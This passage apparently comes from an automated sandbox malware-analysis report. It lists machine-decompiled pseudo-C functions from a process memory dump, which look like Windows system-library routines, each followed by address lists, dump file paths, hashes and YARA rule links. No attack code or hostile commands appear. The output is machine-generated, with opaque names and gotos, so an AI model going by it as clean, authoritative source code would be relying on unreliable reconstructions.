						E00B4138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E00AA7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E00B3FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0xb78724 & 0x00000008) != 0) {
						E00B452F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E00B515B5(0xb78ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                                                                    0x00b50eb7
                                                                                                    0x00b50eb9
                                                                                                    0x00b50ec0
                                                                                                    0x00b50ec2
                                                                                                    0x00b50ecd
                                                                                                    0x00b5105b
                                                                                                    0x00b5105b
                                                                                                    0x00b51061
                                                                                                    0x00b51066
                                                                                                    0x00b51066
                                                                                                    0x00b5106b
                                                                                                    0x00b51073
                                                                                                    0x00b51073
                                                                                                    0x00b50ed3
                                                                                                    0x00b50ed6
                                                                                                    0x00b50edc
                                                                                                    0x00b50ee0
                                                                                                    0x00b50ee7
                                                                                                    0x00b50ef0
                                                                                                    0x00b50ef5
                                                                                                    0x00b50efa
                                                                                                    0x00b50efc
                                                                                                    0x00b50efd
                                                                                                    0x00b50f03
                                                                                                    0x00b50f04
                                                                                                    0x00b50f06
                                                                                                    0x00b50f07
                                                                                                    0x00b50f09
                                                                                                    0x00b50f0e
                                                                                                    0x00b50f14
                                                                                                    0x00b50f23
                                                                                                    0x00b50f2d
                                                                                                    0x00b50f34
                                                                                                    0x00b50f34
                                                                                                    0x00b50f14
                                                                                                    0x00b50f52
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00b50f58
                                                                                                    0x00b50f73
                                                                                                    0x00b50f74
                                                                                                    0x00b50f79
                                                                                                    0x00b50f7d
                                                                                                    0x00b50f80
                                                                                                    0x00b50f86
                                                                                                    0x00b50fab
                                                                                                    0x00b50fb5
                                                                                                    0x00b50fc6
                                                                                                    0x00b50fd1
                                                                                                    0x00b50fe3
                                                                                                    0x00b50fd3
                                                                                                    0x00b50fdc
                                                                                                    0x00b50fdc
                                                                                                    0x00b50feb
                                                                                                    0x00b51009
                                                                                                    0x00b51009
                                                                                                    0x00b51015
                                                                                                    0x00b51027
                                                                                                    0x00b51017
                                                                                                    0x00b51020
                                                                                                    0x00b51020
                                                                                                    0x00b5102f
                                                                                                    0x00b5103c
                                                                                                    0x00b5103c
                                                                                                    0x00b51048
                                                                                                    0x00b51050
                                                                                                    0x00b51050
                                                                                                    0x00b51055
                                                                                                    0x00000000
                                                                                                    0x00b51055
                                                                                                    0x00b50f88
                                                                                                    0x00b50f9e
                                                                                                    0x00b50fa2
                                                                                                    0x00b50fa9
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00b50fa9
                                                                                                    0x00000000

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: `
                                                                                                    • API String ID: 0-2679148245
                                                                                                    • Opcode ID: f19c2408d36eac23c3770e4016d0c73945a0063fa337b00b25bb9dc2082ad2df
                                                                                                    • Instruction ID: 918888640e05abbfa6e5bdd00bf6d5fd1dd084744431b95a55f7cc84e43fb975
                                                                                                    • Opcode Fuzzy Hash: f19c2408d36eac23c3770e4016d0c73945a0063fa337b00b25bb9dc2082ad2df
                                                                                                    • Instruction Fuzzy Hash: D851CE712083429FD725EF28D885B2BB7E5EBC4305F0809ACF99697291D770ED49CB62
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00ABF0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 75%
                                                                                                    			E00ABF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E00AA4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E00AC9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E00AC9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E00AC95D0();
							goto L11;
						} else {
							_t109 = L00AA4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E00ACF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E00AC95D0();
										L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                                                                    0x00abf0d3
                                                                                                    0x00abf0d9
                                                                                                    0x00abf0e0
                                                                                                    0x00abf0e7
                                                                                                    0x00abf0f2
                                                                                                    0x00abf0f4
                                                                                                    0x00abf0f8
                                                                                                    0x00abf100
                                                                                                    0x00abf108
                                                                                                    0x00abf10d
                                                                                                    0x00abf115
                                                                                                    0x00abf116
                                                                                                    0x00abf11f
                                                                                                    0x00abf123
                                                                                                    0x00abf124
                                                                                                    0x00abf12c
                                                                                                    0x00abf130
                                                                                                    0x00abf134
                                                                                                    0x00abf13d
                                                                                                    0x00abf144
                                                                                                    0x00abf14b
                                                                                                    0x00abf152
                                                                                                    0x00afbab0
                                                                                                    0x00afbab0
                                                                                                    0x00abf158
                                                                                                    0x00abf158
                                                                                                    0x00abf15a
                                                                                                    0x00abf160
                                                                                                    0x00abf165
                                                                                                    0x00abf166
                                                                                                    0x00abf16f
                                                                                                    0x00abf173
                                                                                                    0x00afbaa7
                                                                                                    0x00afbaa7
                                                                                                    0x00afbaab
                                                                                                    0x00000000
                                                                                                    0x00abf179
                                                                                                    0x00abf18d
                                                                                                    0x00abf191
                                                                                                    0x00afbaa2
                                                                                                    0x00000000
                                                                                                    0x00abf197
                                                                                                    0x00abf19b
                                                                                                    0x00abf1a2
                                                                                                    0x00abf1a9
                                                                                                    0x00abf1af
                                                                                                    0x00abf1b2
                                                                                                    0x00abf1b6
                                                                                                    0x00abf1b9
                                                                                                    0x00abf1c4
                                                                                                    0x00abf1d8
                                                                                                    0x00abf1df
                                                                                                    0x00abf1e3
                                                                                                    0x00abf1eb
                                                                                                    0x00abf1ee
                                                                                                    0x00abf1f4
                                                                                                    0x00abf20f
                                                                                                    0x00afbab7
                                                                                                    0x00afbabb
                                                                                                    0x00afbacc
                                                                                                    0x00afbad1
                                                                                                    0x00abf215
                                                                                                    0x00abf218
                                                                                                    0x00abf226
                                                                                                    0x00abf22b
                                                                                                    0x00000000
                                                                                                    0x00abf22b
                                                                                                    0x00abf1f6
                                                                                                    0x00abf1f6
                                                                                                    0x00abf1f9
                                                                                                    0x00abf1fb
                                                                                                    0x00abf1fb
                                                                                                    0x00abf1f4
                                                                                                    0x00abf191
                                                                                                    0x00abf173
                                                                                                    0x00abf152
                                                                                                    0x00abf203

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @
                                                                                                    • API String ID: 0-2766056989
                                                                                                    • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                    • Instruction ID: 8bc1f46982d5d6842142a070dfc1f33c9cbd51a8f2dc3b04d980e791c2431581
                                                                                                    • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                    • Instruction Fuzzy Hash: AD519C71504714AFC320DF68C941A6BB7F8FF48710F008A2DFA9587691E7B4E904CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00B03540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 75%
                                                                                                    			E00B03540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0xb7d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E00AC0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E00B03706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E00ACFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E00B03540;
						E00ACFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E00ADDDD0( &_v1072, _t75, _t79, _t80, _t81);
						E00B10C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E00AC97C0();
					}
					return E00ACB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E00B03971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E00B03884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E00ACFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E00AC9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E00B03787(_a4,  &_v352, _t80);
						}
					}
					L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E00AC95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                                                                    0x00b03552
                                                                                                    0x00b0355a
                                                                                                    0x00b0355d
                                                                                                    0x00b03566
                                                                                                    0x00b03567
                                                                                                    0x00b0357e
                                                                                                    0x00b0358f
                                                                                                    0x00b035a1
                                                                                                    0x00b035a5
                                                                                                    0x00b0366b
                                                                                                    0x00b0366b
                                                                                                    0x00b0366d
                                                                                                    0x00b03672
                                                                                                    0x00b03679
                                                                                                    0x00b03685
                                                                                                    0x00b0368d
                                                                                                    0x00b0369d
                                                                                                    0x00b036a7
                                                                                                    0x00b036b8
                                                                                                    0x00b036c6
                                                                                                    0x00b036c7
                                                                                                    0x00b036dc
                                                                                                    0x00b036e1
                                                                                                    0x00b036e7
                                                                                                    0x00b036e9
                                                                                                    0x00b036e9
                                                                                                    0x00b03703
                                                                                                    0x00b03703
                                                                                                    0x00b035b5
                                                                                                    0x00b035c0
                                                                                                    0x00b035c4
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00b035ca
                                                                                                    0x00b035d7
                                                                                                    0x00b035e2
                                                                                                    0x00b035e6
                                                                                                    0x00b035e8
                                                                                                    0x00b035f5
                                                                                                    0x00b035fa
                                                                                                    0x00b03603
                                                                                                    0x00b03604
                                                                                                    0x00b03609
                                                                                                    0x00b0360a
                                                                                                    0x00b03612
                                                                                                    0x00b03613
                                                                                                    0x00b0361e
                                                                                                    0x00b03622
                                                                                                    0x00b03628
                                                                                                    0x00b0362f
                                                                                                    0x00b0362f
                                                                                                    0x00b03636
                                                                                                    0x00b03638
                                                                                                    0x00b0363b
                                                                                                    0x00b03642
                                                                                                    0x00b03642
                                                                                                    0x00b03636
                                                                                                    0x00b03657
                                                                                                    0x00b03657
                                                                                                    0x00b0365c
                                                                                                    0x00b03662
                                                                                                    0x00b03669
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: BinaryHash
                                                                                                    • API String ID: 0-2202222882
                                                                                                    • Opcode ID: 8be3e6374c8bc0fd402decd0b3de5d85888b34009426fc9cef6bb65e774cff27
                                                                                                    • Instruction ID: 8d968e10634b8d911649339961c84a981c7f5f382c268c86bfdaf7ad4ed86ad9
                                                                                                    • Opcode Fuzzy Hash: 8be3e6374c8bc0fd402decd0b3de5d85888b34009426fc9cef6bb65e774cff27
                                                                                                    • Instruction Fuzzy Hash: 674144F190052CAADF21DA50CD85FEEB7BCAB44714F0145E5A609AB281DB319F888F94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00B505AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 71%
                                                                                                    			E00B505AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E00B507DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E00AC9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E00B4A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E00B4A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E00B51293(_t79, _v40, E00B507DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E00AA7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E00B4138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                                                                    0x00b505c5
                                                                                                    0x00b505ca
                                                                                                    0x00b505d3
                                                                                                    0x00b506db
                                                                                                    0x00b506db
                                                                                                    0x00b506dd
                                                                                                    0x00b506e3
                                                                                                    0x00b506e3
                                                                                                    0x00b505dd
                                                                                                    0x00b505e7
                                                                                                    0x00b505f6
                                                                                                    0x00b50600
                                                                                                    0x00b50607
                                                                                                    0x00b50610
                                                                                                    0x00b50615
                                                                                                    0x00b5061a
                                                                                                    0x00b5061c
                                                                                                    0x00b5061e
                                                                                                    0x00b50624
                                                                                                    0x00b50625
                                                                                                    0x00b50627
                                                                                                    0x00b50628
                                                                                                    0x00b50631
                                                                                                    0x00b50640
                                                                                                    0x00b5064d
                                                                                                    0x00b50654
                                                                                                    0x00b50654
                                                                                                    0x00b50631
                                                                                                    0x00b5066d
                                                                                                    0x00b50674
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00b50692
                                                                                                    0x00b5069e
                                                                                                    0x00b506b0
                                                                                                    0x00b506a0
                                                                                                    0x00b506a9
                                                                                                    0x00b506a9
                                                                                                    0x00b506b8
                                                                                                    0x00b506d6
                                                                                                    0x00b506d6
                                                                                                    0x00000000

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: `
                                                                                                    • API String ID: 0-2679148245
                                                                                                    • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                    • Instruction ID: e13842905437137adce4aaa548158647330b2d661e321456d92c88e43c76629e
                                                                                                    • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                    • Instruction Fuzzy Hash: 1F310232614305ABE720EE28CD85F9B77D9EBC4754F0442A9FE58AB280D770ED18CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00B03884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 72%
                                                                                                    			E00B03884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E00AC9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L00AA4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E00AC9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                                                                    0x00b03893
                                                                                                    0x00b03896
                                                                                                    0x00b03899
                                                                                                    0x00b0389f
                                                                                                    0x00b038a0
                                                                                                    0x00b038a4
                                                                                                    0x00b038a9
                                                                                                    0x00b038ac
                                                                                                    0x00b038ad
                                                                                                    0x00b038ae
                                                                                                    0x00b038af
                                                                                                    0x00b038b1
                                                                                                    0x00b038b4
                                                                                                    0x00b038bb
                                                                                                    0x00b038bc
                                                                                                    0x00b038bd
                                                                                                    0x00b038c4
                                                                                                    0x00b038c8
                                                                                                    0x00b038ca
                                                                                                    0x00b038ca
                                                                                                    0x00b038d5
                                                                                                    0x00b0393e
                                                                                                    0x00b03940
                                                                                                    0x00b03942
                                                                                                    0x00b03952
                                                                                                    0x00b03954
                                                                                                    0x00b03961
                                                                                                    0x00b03961
                                                                                                    0x00b03967
                                                                                                    0x00b0396e
                                                                                                    0x00b0396e
                                                                                                    0x00b03947
                                                                                                    0x00b0394c
                                                                                                    0x00000000
                                                                                                    0x00b0394c
                                                                                                    0x00b038ea
                                                                                                    0x00b038ee
                                                                                                    0x00b038f8
                                                                                                    0x00b038f9
                                                                                                    0x00b038ff
                                                                                                    0x00b03900
                                                                                                    0x00b03902
                                                                                                    0x00b03903
                                                                                                    0x00b0390b
                                                                                                    0x00b0390f
                                                                                                    0x00b03950
                                                                                                    0x00000000
                                                                                                    0x00b03950
                                                                                                    0x00b03915
                                                                                                    0x00b0391d
                                                                                                    0x00b0391d
                                                                                                    0x00b03922
                                                                                                    0x00b03926
                                                                                                    0x00000000
                                                                                                    0x00b03928
                                                                                                    0x00b0392b
                                                                                                    0x00b0392b
                                                                                                    0x00b03935
                                                                                                    0x00b03937
                                                                                                    0x00b03937
                                                                                                    0x00000000
                                                                                                    0x00b03935
                                                                                                    0x00b03926
                                                                                                    0x00b038f0
                                                                                                    0x00000000

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: BinaryName
                                                                                                    • API String ID: 0-215506332
                                                                                                    • Opcode ID: 852706aaecab91ff91bccc04777acdcb0bbf0c1c9bf78b3d48c82eea5742fa81
                                                                                                    • Instruction ID: 9e3cea86a11eaddfcd8bac6e527bf740032dcdb999dc852cc8949983e928b06e
                                                                                                    • Opcode Fuzzy Hash: 852706aaecab91ff91bccc04777acdcb0bbf0c1c9bf78b3d48c82eea5742fa81
                                                                                                    • Instruction Fuzzy Hash: FF31D432900619AFDB15DB58C949E7BBBF8EB81B20F1181A9A956A72D0D7709F00C7A0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00ABD294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 33%
                                                                                                    			E00ABD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0xb7d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E00AA4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E00ACB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E00AC98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E00AC95D0();
					L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                                                                    0x00abd29c
                                                                                                    0x00abd2a6
                                                                                                    0x00abd2b1
                                                                                                    0x00abd2b5
                                                                                                    0x00abd2b6
                                                                                                    0x00abd2bc
                                                                                                    0x00abd2bd
                                                                                                    0x00abd2be
                                                                                                    0x00abd2bf
                                                                                                    0x00abd2c2
                                                                                                    0x00abd2c4
                                                                                                    0x00abd2cc
                                                                                                    0x00abd384
                                                                                                    0x00abd34b
                                                                                                    0x00abd34f
                                                                                                    0x00abd350
                                                                                                    0x00abd351
                                                                                                    0x00abd35c
                                                                                                    0x00abd35c
                                                                                                    0x00abd2d6
                                                                                                    0x00abd2da
                                                                                                    0x00abd2e1
                                                                                                    0x00abd361
                                                                                                    0x00abd369
                                                                                                    0x00abd36d
                                                                                                    0x00abd2e3
                                                                                                    0x00abd2e3
                                                                                                    0x00abd2e3
                                                                                                    0x00abd2e5
                                                                                                    0x00abd2ed
                                                                                                    0x00abd2f5
                                                                                                    0x00abd2fa
                                                                                                    0x00abd302
                                                                                                    0x00abd303
                                                                                                    0x00abd30b
                                                                                                    0x00abd30f
                                                                                                    0x00abd313
                                                                                                    0x00abd318
                                                                                                    0x00abd31c
                                                                                                    0x00abd320
                                                                                                    0x00abd379
                                                                                                    0x00abd37d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00afaffe
                                                                                                    0x00afb001
                                                                                                    0x00afb011
                                                                                                    0x00000000
                                                                                                    0x00abd322
                                                                                                    0x00abd322
                                                                                                    0x00abd330
                                                                                                    0x00abd337
                                                                                                    0x00abd35d
                                                                                                    0x00abd339
                                                                                                    0x00abd33f
                                                                                                    0x00abd38c
                                                                                                    0x00abd38c
